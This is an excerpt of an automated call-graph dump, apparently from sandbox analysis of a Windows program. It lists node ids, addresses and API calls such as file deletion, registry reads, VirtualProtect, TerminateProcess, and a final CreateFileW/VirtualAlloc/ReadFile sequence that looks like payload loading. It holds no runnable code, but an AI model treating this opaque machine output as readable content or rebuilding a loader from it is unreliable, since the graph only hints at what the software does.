EnterCriticalSection 97756->97763 97757 82a8c7 22 API calls 97757->97763 97758->97762 97760 82fbe3 97760->97762 97764 874bdc 97760->97764 97768 82f3ae ISource 97760->97768 97761 82a961 22 API calls 97761->97763 97762->97579 97763->97746 97763->97747 97763->97748 97763->97751 97763->97752 97763->97756 97763->97757 97763->97760 97763->97761 97763->97762 97766 874beb 97763->97766 97767 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97763->97767 97763->97768 98363 8301e0 235 API calls 2 library calls 97763->98363 98364 8306a0 41 API calls ISource 97763->98364 98367 89359c 82 API calls __wsopen_s 97764->98367 98368 89359c 82 API calls __wsopen_s 97766->98368 97767->97763 97768->97762 98365 89359c 82 API calls __wsopen_s 97768->98365 97769->97579 97770->97593 97771->97593 97772->97593 97773->97608 97774->97608 97775->97608 97776->97605 97777->97613 97778->97608 97779->97608 97780->97608 97781->97608 97782->97608 97783->97608 97907 88dbbe lstrlenW 97784->97907 97788 827510 53 API calls 97787->97788 97789 89f126 97788->97789 97912 829e90 97789->97912 97791 89f136 97792 89f15b 97791->97792 97793 82ec40 235 API calls 97791->97793 97795 89f15f 97792->97795 97940 829c6e 22 API calls 97792->97940 97793->97792 97795->97670 97950 8a7f59 97796->97950 97798 8a95af 97798->97670 97800 82a961 22 API calls 97799->97800 97801 896f1d 97800->97801 97802 82a961 22 API calls 97801->97802 97803 896f26 97802->97803 97804 896f3a 97803->97804 98209 82b567 39 API calls 97803->98209 97806 827510 53 API calls 97804->97806 97813 896f57 _wcslen 97806->97813 97807 896fbc 97809 827510 53 API calls 97807->97809 97808 8970bf 97810 824ecb 94 API calls 97808->97810 97811 896fc8 97809->97811 97812 8970d0 97810->97812 97816 82a8c7 22 API calls 97811->97816 97820 896fdb 97811->97820 97814 8970e5 97812->97814 97817 824ecb 94 API calls 97812->97817 97813->97807 97813->97808 97878 8970e9 97813->97878 97815 82a961 22 API calls 97814->97815 97814->97878 97818 89711a 97815->97818 97816->97820 97817->97814 97819 82a961 22 API calls 97818->97819 97823 897126 97819->97823 97821 897027 97820->97821 97824 897005 97820->97824 97827 82a8c7 22 API calls 97820->97827 97822 827510 53 API calls 97821->97822 97825 897034 97822->97825 97826 82a961 22 API calls 97823->97826 97828 8233c6 22 API calls 97824->97828 97829 89703d 97825->97829 97830 897047 97825->97830 97831 89712f 97826->97831 97827->97824 97832 89700f 97828->97832 97833 82a8c7 22 API calls 97829->97833 98210 88e199 GetFileAttributesW 97830->98210 97835 82a961 22 API calls 97831->97835 97836 827510 53 API calls 97832->97836 97833->97830 97838 897138 97835->97838 97839 89701b 97836->97839 97837 897050 97841 897063 97837->97841 97844 824c6d 22 API calls 97837->97844 97842 827510 53 API calls 97838->97842 97840 826350 22 API calls 97839->97840 97840->97821 97843 827510 53 API calls 97841->97843 97850 897069 97841->97850 97845 897145 97842->97845 97846 8970a0 97843->97846 97844->97841 98055 82525f 97845->98055 98211 88d076 57 API calls 97846->98211 97849 897166 98097 824c6d 97849->98097 97850->97878 97853 8971a9 97855 82a8c7 22 API calls 97853->97855 97854 824c6d 22 API calls 97856 897186 97854->97856 97857 8971ba 97855->97857 97856->97853 97859 826b57 22 API calls 97856->97859 97858 826350 22 API calls 97857->97858 97860 8971c8 97858->97860 97861 89719b 97859->97861 97862 826350 22 API calls 97860->97862 97863 826b57 22 API calls 97861->97863 97864 8971d6 97862->97864 97863->97853 97865 826350 22 API calls 97864->97865 97866 8971e4 97865->97866 97867 827510 53 API calls 97866->97867 97868 8971f0 97867->97868 98100 88d7bc 97868->98100 97870 897201 97871 88d4ce 4 API calls 97870->97871 97872 89720b 97871->97872 97873 827510 53 API calls 97872->97873 97877 897239 97872->97877 97874 897229 97873->97874 98154 892947 97874->98154 97876 824f39 68 API calls 97876->97878 97877->97876 97878->97670 97880 891e9f 97879->97880 97881 891ea4 97879->97881 98277 890f67 97880->98277 97881->97670 97884 8a7f59 120 API calls 97883->97884 97885 8a959b 97884->97885 97885->97670 97886->97669 97887->97629 97888->97632 97890 82acf9 97889->97890 97894 82ad2a ISource 97889->97894 97891 82ad55 97890->97891 97892 82ad01 ISource 97890->97892 97893 82a8c7 22 API calls 97891->97893 97891->97894 97892->97894 97895 82ad21 97892->97895 97896 86fa48 97892->97896 97893->97894 97894->97643 97895->97894 97897 86fa3a VariantClear 97895->97897 97896->97894 98298 83ce17 22 API calls ISource 97896->98298 97897->97894 97899->97656 97900->97656 97901->97634 97902->97670 97903->97670 97904->97670 97905->97666 97906->97670 97908 88dbdc GetFileAttributesW 97907->97908 97909 88d4d5 97907->97909 97908->97909 97910 88dbe8 FindFirstFileW 97908->97910 97909->97670 97910->97909 97911 88dbf9 FindClose 97910->97911 97911->97909 97913 826270 22 API calls 97912->97913 97914 829eb5 97913->97914 97915 829fd2 97914->97915 97920 86f7c4 97914->97920 97921 86f699 97914->97921 97923 82a405 97914->97923 97924 82a4a1 22 API calls 97914->97924 97927 82a6c3 22 API calls 97914->97927 97935 82a12c __fread_nolock 97914->97935 97936 82a587 22 API calls 97914->97936 97937 82aec9 22 API calls 97914->97937 97941 824573 41 API calls _wcslen 97914->97941 97944 8248c8 23 API calls 97914->97944 97945 8249bd 22 API calls __fread_nolock 97914->97945 97946 82a673 22 API calls 97914->97946 97942 82a4a1 22 API calls __fread_nolock 97915->97942 97917 829fec 97917->97791 97947 8896e2 84 API calls __wsopen_s 97920->97947 97928 83fddb 22 API calls 97921->97928 97923->97917 97949 8896e2 84 API calls __wsopen_s 97923->97949 97924->97914 97927->97914 97930 86f754 97928->97930 97929 86f7d2 97948 82a4a1 22 API calls __fread_nolock 97929->97948 97933 83fe0b 22 API calls 97930->97933 97932 86f7e8 97932->97917 97933->97935 97935->97920 97935->97923 97936->97914 97938 82a0db CharUpperBuffW 97937->97938 97943 82a673 22 API calls 97938->97943 97940->97795 97941->97914 97942->97917 97943->97914 97944->97914 97945->97914 97946->97914 97947->97929 97948->97932 97949->97917 97951 827510 53 API calls 97950->97951 97952 8a7f90 97951->97952 97973 8a7fd5 ISource 97952->97973 97988 8a8cd3 97952->97988 97954 8a8281 97955 8a844f 97954->97955 97960 8a828f 97954->97960 98028 8a8ee4 60 API calls 97955->98028 97958 8a845e 97959 8a846a 97958->97959 97958->97960 97959->97973 98001 8a7e86 97960->98001 97961 827510 53 API calls 97978 8a8049 97961->97978 97966 8a82c8 98016 83fc70 97966->98016 97969 8a82e8 98022 89359c 82 API calls __wsopen_s 97969->98022 97970 8a8302 98023 8263eb 22 API calls 97970->98023 97973->97798 97974 8a82f3 GetCurrentProcess TerminateProcess 97974->97970 97975 8a8311 98024 826a50 22 API calls 97975->98024 97977 8a832a 97986 8a8352 97977->97986 98025 8304f0 22 API calls 97977->98025 97978->97954 97978->97961 97978->97973 98020 88417d 22 API calls __fread_nolock 97978->98020 98021 8a851d 42 API calls _strftime 97978->98021 97980 8a84c5 97980->97973 97984 8a84d9 FreeLibrary 97980->97984 97981 8a8341 98026 8a8b7b 75 API calls 97981->98026 97984->97973 97986->97980 97987 82aceb 23 API calls 97986->97987 98027 8304f0 22 API calls 97986->98027 98029 8a8b7b 75 API calls 97986->98029 97987->97986 97989 82aec9 22 API calls 97988->97989 97990 8a8cee CharLowerBuffW 97989->97990 98030 888e54 97990->98030 97994 82a961 22 API calls 97995 8a8d2a 97994->97995 98037 826d25 97995->98037 97997 8a8d3e 97998 8293b2 22 API calls 97997->97998 98000 8a8d48 _wcslen 97998->98000 97999 8a8e5e _wcslen 97999->97978 98000->97999 98050 8a851d 42 API calls _strftime 98000->98050 98002 8a7ea1 98001->98002 98006 8a7eec 98001->98006 98003 83fe0b 22 API calls 98002->98003 98004 8a7ec3 98003->98004 98005 83fddb 22 API calls 98004->98005 98004->98006 98005->98004 98007 8a9096 98006->98007 98008 8a92ab ISource 98007->98008 98013 8a90ba _strcat _wcslen 98007->98013 98008->97966 98009 82b6b5 39 API calls 98009->98013 98010 82b38f 39 API calls 98010->98013 98011 82b567 39 API calls 98011->98013 98012 827510 53 API calls 98012->98013 98013->98008 98013->98009 98013->98010 98013->98011 98013->98012 98014 84ea0c 21 API calls ___std_exception_copy 98013->98014 98054 88efae 24 API calls _wcslen 98013->98054 98014->98013 98018 83fc85 98016->98018 98017 83fd1d VirtualProtect 98019 83fceb 98017->98019 98018->98017 98018->98019 98019->97969 98019->97970 98020->97978 98021->97978 98022->97974 98023->97975 98024->97977 98025->97981 98026->97986 98027->97986 98028->97958 98029->97986 98031 888e74 _wcslen 98030->98031 98032 888f63 98031->98032 98034 888ea9 98031->98034 98036 888f68 98031->98036 98032->97994 98032->98000 98034->98032 98051 83ce60 41 API calls 98034->98051 98036->98032 98052 83ce60 41 API calls 98036->98052 98038 826d91 98037->98038 98039 826d34 98037->98039 98040 8293b2 22 API calls 98038->98040 98039->98038 98041 826d3f 98039->98041 98047 826d62 __fread_nolock 98040->98047 98042 826d5a 98041->98042 98043 864c9d 98041->98043 98053 826f34 22 API calls 98042->98053 98044 83fddb 22 API calls 98043->98044 98046 864ca7 98044->98046 98048 83fe0b 22 API calls 98046->98048 98047->97997 98049 864cda 98048->98049 98050->97999 98051->98034 98052->98036 98053->98047 98054->98013 98056 82a961 22 API calls 98055->98056 98057 825275 98056->98057 98058 82a961 22 API calls 98057->98058 98059 82527d 98058->98059 98060 82a961 22 API calls 98059->98060 98061 825285 98060->98061 98062 82a961 22 API calls 98061->98062 98063 82528d 98062->98063 98064 863df5 98063->98064 98065 8252c1 98063->98065 98066 82a8c7 22 API calls 98064->98066 98067 826d25 22 API calls 98065->98067 98068 863dfe 98066->98068 98069 8252cf 98067->98069 98070 82a6c3 22 API calls 98068->98070 98071 8293b2 22 API calls 98069->98071 98074 825304 98070->98074 98072 8252d9 98071->98072 98073 826d25 22 API calls 98072->98073 98072->98074 98077 8252fa 98073->98077 98075 825325 98074->98075 98089 825349 98074->98089 98096 863e20 98074->98096 98079 824c6d 22 API calls 98075->98079 98075->98089 98076 826d25 22 API calls 98080 82535a 98076->98080 98078 8293b2 22 API calls 98077->98078 98078->98074 98083 825332 98079->98083 98081 825370 98080->98081 98085 82a8c7 22 API calls 98080->98085 98082 825384 98081->98082 98087 82a8c7 22 API calls 98081->98087 98086 82538f 98082->98086 98090 82a8c7 22 API calls 98082->98090 98088 826d25 22 API calls 98083->98088 98083->98089 98084 826b57 22 API calls 98093 863ee0 98084->98093 98085->98081 98091 82a8c7 22 API calls 98086->98091 98094 82539a 98086->98094 98087->98082 98088->98089 98089->98076 98090->98086 98091->98094 98092 824c6d 22 API calls 98092->98093 98093->98089 98093->98092 98212 8249bd 22 API calls __fread_nolock 98093->98212 98094->97849 98096->98084 98098 82aec9 22 API calls 98097->98098 98099 824c78 98098->98099 98099->97853 98099->97854 98101 88d7d8 98100->98101 98102 88d7dd 98101->98102 98103 88d7f3 98101->98103 98105 82a8c7 22 API calls 98102->98105 98153 88d7ee 98102->98153 98104 82a961 22 API calls 98103->98104 98106 88d7fb 98104->98106 98105->98153 98107 82a961 22 API calls 98106->98107 98108 88d803 98107->98108 98109 82a961 22 API calls 98108->98109 98110 88d80e 98109->98110 98111 82a961 22 API calls 98110->98111 98112 88d816 98111->98112 98113 82a961 22 API calls 98112->98113 98114 88d81e 98113->98114 98115 82a961 22 API calls 98114->98115 98116 88d826 98115->98116 98117 82a961 22 API calls 98116->98117 98118 88d82e 98117->98118 98119 82a961 22 API calls 98118->98119 98120 88d836 98119->98120 98121 82525f 22 API calls 98120->98121 98122 88d84d 98121->98122 98123 82525f 22 API calls 98122->98123 98124 88d866 98123->98124 98125 824c6d 22 API calls 98124->98125 98126 88d872 98125->98126 98127 88d885 98126->98127 98128 8293b2 22 API calls 98126->98128 98129 824c6d 22 API calls 98127->98129 98128->98127 98130 88d88e 98129->98130 98131 88d89e 98130->98131 98132 8293b2 22 API calls 98130->98132 98133 88d8b0 98131->98133 98134 82a8c7 22 API calls 98131->98134 98132->98131 98135 826350 22 API calls 98133->98135 98134->98133 98136 88d8bb 98135->98136 98213 88d978 22 API calls 98136->98213 98138 88d8ca 98214 88d978 22 API calls 98138->98214 98140 88d8dd 98141 824c6d 22 API calls 98140->98141 98142 88d8e7 98141->98142 98143 88d8ec 98142->98143 98144 88d8fe 98142->98144 98146 8233c6 22 API calls 98143->98146 98145 824c6d 22 API calls 98144->98145 98148 88d907 98145->98148 98147 88d8f9 98146->98147 98151 826350 22 API calls 98147->98151 98149 88d925 98148->98149 98150 8233c6 22 API calls 98148->98150 98152 826350 22 API calls 98149->98152 98150->98147 98151->98149 98152->98153 98153->97870 98155 892954 __wsopen_s 98154->98155 98156 83fe0b 22 API calls 98155->98156 98157 892971 98156->98157 98158 825722 22 API calls 98157->98158 98159 89297b 98158->98159 98160 89274e 27 API calls 98159->98160 98161 892986 98160->98161 98162 82511f 64 API calls 98161->98162 98163 89299b 98162->98163 98164 892a6c 98163->98164 98165 8929bf 98163->98165 98166 892e66 75 API calls 98164->98166 98167 892e66 75 API calls 98165->98167 98182 892a38 98166->98182 98168 8929c4 98167->98168 98175 892a75 ISource 98168->98175 98228 84d583 26 API calls 98168->98228 98170 8250f5 40 API calls 98171 892a91 98170->98171 98172 8250f5 40 API calls 98171->98172 98174 892aa1 98172->98174 98173 8929ed 98229 84d583 26 API calls 98173->98229 98176 8250f5 40 API calls 98174->98176 98175->97877 98178 892abc 98176->98178 98179 8250f5 40 API calls 98178->98179 98180 892acc 98179->98180 98181 8250f5 40 API calls 98180->98181 98183 892ae7 98181->98183 98182->98170 98182->98175 98184 8250f5 40 API calls 98183->98184 98185 892af7 98184->98185 98186 8250f5 40 API calls 98185->98186 98187 892b07 98186->98187 98188 8250f5 40 API calls 98187->98188 98189 892b17 98188->98189 98215 893017 GetTempPathW GetTempFileNameW 98189->98215 98191 892b22 98192 84e5eb 29 API calls 98191->98192 98202 892b33 98192->98202 98193 892bed 98194 84e678 67 API calls 98193->98194 98195 892bf8 98194->98195 98197 892bfe DeleteFileW 98195->98197 98198 892c12 98195->98198 98196 8250f5 40 API calls 98196->98202 98197->98175 98199 892c91 CopyFileW 98198->98199 98205 892c18 98198->98205 98200 892cb9 DeleteFileW 98199->98200 98201 892ca7 DeleteFileW 98199->98201 98225 892fd8 CreateFileW 98200->98225 98201->98175 98202->98175 98202->98193 98202->98196 98216 84dbb3 98202->98216 98230 8922ce 79 API calls 98205->98230 98207 892c7c 98207->98200 98208 892c80 DeleteFileW 98207->98208 98208->98175 98209->97804 98210->97837 98211->97850 98212->98093 98213->98138 98214->98140 98215->98191 98217 84dbc1 98216->98217 98223 84dbdd 98216->98223 98218 84dbe3 98217->98218 98219 84dbcd 98217->98219 98217->98223 98231 84d9cc 98218->98231 98234 84f2d9 20 API calls _abort 98219->98234 98222 84dbd2 98235 8527ec 26 API calls pre_c_initialization 98222->98235 98223->98202 98226 892fff SetFileTime CloseHandle 98225->98226 98227 893013 98225->98227 98226->98227 98227->98175 98228->98173 98229->98182 98230->98207 98236 84d97b 98231->98236 98233 84d9f0 98233->98223 98234->98222 98235->98223 98237 84d987 CallCatchBlock 98236->98237 98244 84918d EnterCriticalSection 98237->98244 98239 84d995 98245 84d9f4 98239->98245 98243 84d9b3 __fread_nolock 98243->98233 98244->98239 98253 8549a1 98245->98253 98251 84d9a2 98252 84d9c0 LeaveCriticalSection __fread_nolock 98251->98252 98252->98243 98254 84d955 __fread_nolock 26 API calls 98253->98254 98255 8549b0 98254->98255 98256 85f89b __fread_nolock 26 API calls 98255->98256 98257 8549b6 98256->98257 98261 84da09 98257->98261 98274 853820 21 API calls 2 library calls 98257->98274 98259 854a15 98260 8529c8 _free 20 API calls 98259->98260 98260->98261 98262 84da3a 98261->98262 98263 84da4c 98262->98263 98268 84da24 98262->98268 98264 84da5a 98263->98264 98263->98268 98271 84da85 __fread_nolock 98263->98271 98275 84f2d9 20 API calls _abort 98264->98275 98266 84da5f 98276 8527ec 26 API calls pre_c_initialization 98266->98276 98273 854a56 62 API calls 98268->98273 98269 84dc0b 62 API calls 98269->98271 98270 84d955 __fread_nolock 26 API calls 98270->98271 98271->98268 98271->98269 98271->98270 98272 8559be __wsopen_s 62 API calls 98271->98272 98272->98271 98273->98251 98274->98259 98275->98266 98276->98268 98278 890f7e 98277->98278 98292 891097 98277->98292 98279 890fcb 98278->98279 98280 890f9e 98278->98280 98282 890fe2 98278->98282 98281 83fe0b 22 API calls 98279->98281 98280->98279 98283 890fb2 98280->98283 98295 890fc0 __fread_nolock 98281->98295 98285 83fe0b 22 API calls 98282->98285 98293 890fff 98282->98293 98286 83fe0b 22 API calls 98283->98286 98284 891026 98287 83fe0b 22 API calls 98284->98287 98285->98293 98286->98295 98288 89102c 98287->98288 98296 83f1d8 22 API calls 98288->98296 98289 83fddb 22 API calls 98289->98292 98291 891038 98297 83f6c9 24 API calls 98291->98297 98292->97881 98293->98283 98293->98284 98293->98295 98295->98289 98296->98291 98297->98295 98298->97894 98300 82ae01 98299->98300 98303 82ae1c ISource 98299->98303 98301 82aec9 22 API calls 98300->98301 98302 82ae09 CharUpperBuffW 98301->98302 98302->98303 98303->97687 98305 82acae 98304->98305 98306 82acd1 98305->98306 98341 89359c 82 API calls __wsopen_s 98305->98341 98306->97699 98309 82ad92 98308->98309 98310 86fadb 98308->98310 98311 83fddb 22 API calls 98309->98311 98312 82ad99 98311->98312 98342 82adcd 98312->98342 98316 86f86f 98315->98316 98317 82a718 98315->98317 98318 86f87f 98316->98318 98361 884d4a 22 API calls ISource 98316->98361 98319 82a763 ISource 98317->98319 98321 82a746 98317->98321 98323 82af8a 22 API calls 98317->98323 98319->97740 98322 82a74c 98321->98322 98349 82af8a 98321->98349 98322->98319 98357 82b090 98322->98357 98323->98321 98326->97740 98327->97691 98328->97729 98329->97708 98330->97729 98331->97729 98332->97699 98333->97699 98334->97699 98335->97699 98336->97699 98337->97722 98338->97729 98339->97726 98340->97729 98341->98306 98345 82addd 98342->98345 98343 82adb6 98343->97699 98344 83fddb 22 API calls 98344->98345 98345->98343 98345->98344 98346 82a961 22 API calls 98345->98346 98347 82adcd 22 API calls 98345->98347 98348 82a8c7 22 API calls 98345->98348 98346->98345 98347->98345 98348->98345 98350 82afc0 ISource 98349->98350 98351 82af98 98349->98351 98350->98322 98352 82afa6 98351->98352 98353 82af8a 22 API calls 98351->98353 98354 82afac 98352->98354 98355 82af8a 22 API calls 98352->98355 98353->98352 98354->98350 98356 82b090 22 API calls 98354->98356 98355->98354 98356->98350 98358 82b09b ISource 98357->98358 98359 82b0d6 ISource 98358->98359 98362 83ce17 22 API calls ISource 98358->98362 98359->98319 98361->98318 98362->98359 98363->97763 98364->97763 98365->97762 98366->97762 98367->97766 98368->97762 98369 858402 98374 8581be 98369->98374 98372 85842a 98379 8581ef try_get_first_available_module 98374->98379 98376 8583ee 98393 8527ec 26 API calls pre_c_initialization 98376->98393 98378 858343 98378->98372 98386 860984 98378->98386 98382 858338 98379->98382 98389 848e0b 40 API calls 2 library calls 98379->98389 98381 85838c 98381->98382 98390 848e0b 40 API calls 2 library calls 98381->98390 98382->98378 98392 84f2d9 20 API calls _abort 98382->98392 98384 8583ab 98384->98382 98391 848e0b 40 API calls 2 library calls 98384->98391 98394 860081 98386->98394 98388 86099f 98388->98372 98389->98381 98390->98384 98391->98382 98392->98376 98393->98378 98396 86008d CallCatchBlock 98394->98396 98395 86009b 98452 84f2d9 20 API calls _abort 98395->98452 98396->98395 98398 8600d4 98396->98398 98405 86065b 98398->98405 98399 8600a0 98453 8527ec 26 API calls pre_c_initialization 98399->98453 98404 8600aa __fread_nolock 98404->98388 98455 86042f 98405->98455 98408 8606a6 98473 855221 98408->98473 98409 86068d 98487 84f2c6 20 API calls _abort 98409->98487 98412 860692 98488 84f2d9 20 API calls _abort 98412->98488 98413 8606ab 98414 8606b4 98413->98414 98415 8606cb 98413->98415 98489 84f2c6 20 API calls _abort 98414->98489 98486 86039a CreateFileW 98415->98486 98419 8606b9 98490 84f2d9 20 API calls _abort 98419->98490 98421 860781 GetFileType 98423 8607d3 98421->98423 98424 86078c GetLastError 98421->98424 98422 860756 GetLastError 98492 84f2a3 20 API calls __dosmaperr 98422->98492 98495 85516a 21 API calls 2 library calls 98423->98495 98493 84f2a3 20 API calls __dosmaperr 98424->98493 98425 860704 98425->98421 98425->98422 98491 86039a CreateFileW 98425->98491 98429 86079a CloseHandle 98429->98412 98432 8607c3 98429->98432 98431 860749 98431->98421 98431->98422 98494 84f2d9 20 API calls _abort 98432->98494 98433 8607f4 98435 860840 98433->98435 98496 8605ab 72 API calls 3 library calls 98433->98496 98440 86086d 98435->98440 98497 86014d 72 API calls 4 library calls 98435->98497 98436 8607c8 98436->98412 98439 860866 98439->98440 98442 86087e 98439->98442 98441 8586ae __wsopen_s 29 API calls 98440->98441 98443 8600f8 98441->98443 98442->98443 98444 8608fc CloseHandle 98442->98444 98454 860121 LeaveCriticalSection __wsopen_s 98443->98454 98498 86039a CreateFileW 98444->98498 98446 860927 98447 86095d 98446->98447 98448 860931 GetLastError 98446->98448 98447->98443 98499 84f2a3 20 API calls __dosmaperr 98448->98499 98450 86093d 98500 855333 21 API calls 2 library calls 98450->98500 98452->98399 98453->98404 98454->98404 98456 86046a 98455->98456 98457 860450 98455->98457 98501 8603bf 98456->98501 98457->98456 98508 84f2d9 20 API calls _abort 98457->98508 98460 86045f 98509 8527ec 26 API calls pre_c_initialization 98460->98509 98462 8604a2 98463 8604d1 98462->98463 98510 84f2d9 20 API calls _abort 98462->98510 98471 860524 98463->98471 98512 84d70d 26 API calls 2 library calls 98463->98512 98466 86051f 98468 86059e 98466->98468 98466->98471 98467 8604c6 98511 8527ec 26 API calls pre_c_initialization 98467->98511 98513 8527fc 11 API calls _abort 98468->98513 98471->98408 98471->98409 98472 8605aa 98474 85522d CallCatchBlock 98473->98474 98516 852f5e EnterCriticalSection 98474->98516 98476 855234 98478 855259 98476->98478 98482 8552c7 EnterCriticalSection 98476->98482 98484 85527b 98476->98484 98520 855000 21 API calls 3 library calls 98478->98520 98480 85525e 98480->98484 98521 855147 EnterCriticalSection 98480->98521 98481 8552a4 __fread_nolock 98481->98413 98482->98484 98485 8552d4 LeaveCriticalSection 98482->98485 98517 85532a 98484->98517 98485->98476 98486->98425 98487->98412 98488->98443 98489->98419 98490->98412 98491->98431 98492->98412 98493->98429 98494->98436 98495->98433 98496->98435 98497->98439 98498->98446 98499->98450 98500->98447 98503 8603d7 98501->98503 98502 8603f2 98502->98462 98503->98502 98514 84f2d9 20 API calls _abort 98503->98514 98505 860416 98515 8527ec 26 API calls pre_c_initialization 98505->98515 98507 860421 98507->98462 98508->98460 98509->98456 98510->98467 98511->98463 98512->98466 98513->98472 98514->98505 98515->98507 98516->98476 98522 852fa6 LeaveCriticalSection 98517->98522 98519 855331 98519->98481 98520->98480 98521->98484 98522->98519 98523 821cad SystemParametersInfoW 98524 821033 98529 824c91 98524->98529 98528 821042 98530 82a961 22 API calls 98529->98530 98531 824cff 98530->98531 98537 823af0 98531->98537 98534 824d9c 98535 821038 98534->98535 98540 8251f7 22 API calls __fread_nolock 98534->98540 98536 8400a3 29 API calls __onexit 98535->98536 98536->98528 98541 823b1c 98537->98541 98540->98534 98542 823b0f 98541->98542 98543 823b29 98541->98543 98542->98534 98543->98542 98544 823b30 RegOpenKeyExW 98543->98544 98544->98542 98545 823b4a RegQueryValueExW 98544->98545 98546 823b80 RegCloseKey 98545->98546 98547 823b6b 98545->98547 98546->98542 98547->98546 98548 873f75 98559 83ceb1 98548->98559 98550 873f8b 98551 874006 98550->98551 98568 83e300 23 API calls 98550->98568 98553 82bf40 235 API calls 98551->98553 98555 874052 98553->98555 98556 874a88 98555->98556 98570 89359c 82 API calls __wsopen_s 98555->98570 98557 873fe6 98557->98555 98569 891abf 22 API calls 98557->98569 98560 83ced2 98559->98560 98561 83cebf 98559->98561 98563 83ced7 98560->98563 98564 83cf05 98560->98564 98562 82aceb 23 API calls 98561->98562 98567 83cec9 98562->98567 98566 83fddb 22 API calls 98563->98566 98565 82aceb 23 API calls 98564->98565 98565->98567 98566->98567 98567->98550 98568->98557 98569->98551 98570->98556 98571 823156 98574 823170 98571->98574 98575 823187 98574->98575 98576 8231eb 98575->98576 98577 82318c 98575->98577 98613 8231e9 98575->98613 98579 8231f1 98576->98579 98580 862dfb 98576->98580 98581 823265 PostQuitMessage 98577->98581 98582 823199 98577->98582 98578 8231d0 DefWindowProcW 98616 82316a 98578->98616 98583 8231f8 98579->98583 98584 82321d SetTimer RegisterWindowMessageW 98579->98584 98630 8218e2 10 API calls 98580->98630 98581->98616 98586 8231a4 98582->98586 98587 862e7c 98582->98587 98588 823201 KillTimer 98583->98588 98589 862d9c 98583->98589 98591 823246 CreatePopupMenu 98584->98591 98584->98616 98592 8231ae 98586->98592 98593 862e68 98586->98593 98634 88bf30 34 API calls ___scrt_fastfail 98587->98634 98626 8230f2 Shell_NotifyIconW ___scrt_fastfail 98588->98626 98595 862dd7 MoveWindow 98589->98595 98596 862da1 98589->98596 98590 862e1c 98631 83e499 42 API calls 98590->98631 98591->98616 98600 862e4d 98592->98600 98601 8231b9 98592->98601 98619 88c161 98593->98619 98595->98616 98603 862dc6 SetFocus 98596->98603 98604 862da7 98596->98604 98600->98578 98633 880ad7 22 API calls 98600->98633 98606 8231c4 98601->98606 98607 823253 98601->98607 98602 862e8e 98602->98578 98602->98616 98603->98616 98604->98606 98608 862db0 98604->98608 98605 823214 98627 823c50 DeleteObject DestroyWindow 98605->98627 98606->98578 98632 8230f2 Shell_NotifyIconW ___scrt_fastfail 98606->98632 98628 82326f 44 API calls ___scrt_fastfail 98607->98628 98629 8218e2 10 API calls 98608->98629 98613->98578 98614 823263 98614->98616 98617 862e41 98618 823837 49 API calls 98617->98618 98618->98613 98620 88c179 ___scrt_fastfail 98619->98620 98621 88c276 98619->98621 98622 823923 24 API calls 98620->98622 98621->98616 98624 88c1a0 98622->98624 98623 88c25f KillTimer SetTimer 98623->98621 98624->98623 98625 88c251 Shell_NotifyIconW 98624->98625 98625->98623 98626->98605 98627->98616 98628->98614 98629->98616 98630->98590 98631->98606 98632->98617 98633->98613 98634->98602 98635 822e37 98636 82a961 22 API calls 98635->98636 98637 822e4d 98636->98637 98714 824ae3 98637->98714 98639 822e6b 98640 823a5a 24 API calls 98639->98640 98641 822e7f 98640->98641 98642 829cb3 22 API calls 98641->98642 98643 822e8c 98642->98643 98644 824ecb 94 API calls 98643->98644 98645 822ea5 98644->98645 98646 862cb0 98645->98646 98647 822ead 98645->98647 98648 892cf9 80 API calls 98646->98648 98650 82a8c7 22 API calls 98647->98650 98649 862cc3 98648->98649 98651 824f39 68 API calls 98649->98651 98653 862ccf 98649->98653 98652 822ec3 98650->98652 98651->98653 98728 826f88 22 API calls 98652->98728 98655 824f39 68 API calls 98653->98655 98657 862ce5 98655->98657 98656 822ecf 98658 829cb3 22 API calls 98656->98658 98744 823084 22 API calls 98657->98744 98659 822edc 98658->98659 98729 82a81b 41 API calls 98659->98729 98661 822eec 98664 829cb3 22 API calls 98661->98664 98663 862d02 98745 823084 22 API calls 98663->98745 98665 822f12 98664->98665 98730 82a81b 41 API calls 98665->98730 98667 862d1e 98669 823a5a 24 API calls 98667->98669 98670 862d44 98669->98670 98746 823084 22 API calls 98670->98746 98671 822f21 98674 82a961 22 API calls 98671->98674 98673 862d50 98675 82a8c7 22 API calls 98673->98675 98676 822f3f 98674->98676 98677 862d5e 98675->98677 98731 823084 22 API calls 98676->98731 98747 823084 22 API calls 98677->98747 98680 822f4b 98732 844a28 40 API calls 3 library calls 98680->98732 98681 862d6d 98686 82a8c7 22 API calls 98681->98686 98683 822f59 98683->98657 98684 822f63 98683->98684 98733 844a28 40 API calls 3 library calls 98684->98733 98688 862d83 98686->98688 98687 822f6e 98687->98663 98689 822f78 98687->98689 98748 823084 22 API calls 98688->98748 98734 844a28 40 API calls 3 library calls 98689->98734 98691 862d90 98693 822f83 98693->98667 98694 822f8d 98693->98694 98735 844a28 40 API calls 3 library calls 98694->98735 98696 822f98 98697 822fdc 98696->98697 98736 823084 22 API calls 98696->98736 98697->98681 98698 822fe8 98697->98698 98698->98691 98738 8263eb 22 API calls 98698->98738 98701 822fbf 98703 82a8c7 22 API calls 98701->98703 98702 822ff8 98739 826a50 22 API calls 98702->98739 98704 822fcd 98703->98704 98737 823084 22 API calls 98704->98737 98707 823006 98740 8270b0 23 API calls 98707->98740 98711 823021 98712 823065 98711->98712 98741 826f88 22 API calls 98711->98741 98742 8270b0 23 API calls 98711->98742 98743 823084 22 API calls 98711->98743 98715 824af0 __wsopen_s 98714->98715 98716 826b57 22 API calls 98715->98716 98717 824b22 98715->98717 98716->98717 98718 824c6d 22 API calls 98717->98718 98727 824b58 98717->98727 98718->98717 98719 824c6d 22 API calls 98719->98727 98720 829cb3 22 API calls 98722 824c52 98720->98722 98721 829cb3 22 API calls 98721->98727 98723 82515f 22 API calls 98722->98723 98725 824c5e 98723->98725 98724 82515f 22 API calls 98724->98727 98725->98639 98726 824c29 98726->98720 98726->98725 98727->98719 98727->98721 98727->98724 98727->98726 98728->98656 98729->98661 98730->98671 98731->98680 98732->98683 98733->98687 98734->98693 98735->98696 98736->98701 98737->98697 98738->98702 98739->98707 98740->98711 98741->98711 98742->98711 98743->98711 98744->98663 98745->98667 98746->98673 98747->98681 98748->98691 98749 b64040 98763 b61c90 98749->98763 98751 b640fd 98766 b63f30 98751->98766 98753 b64126 CreateFileW 98755 b64175 98753->98755 98756 b6417a 98753->98756 98756->98755 98757 b64191 VirtualAlloc 98756->98757 98757->98755 98758 b641af ReadFile 98757->98758 98758->98755 98759 b641ca 98758->98759 98760 b62f30 13 API calls 98759->98760 98761 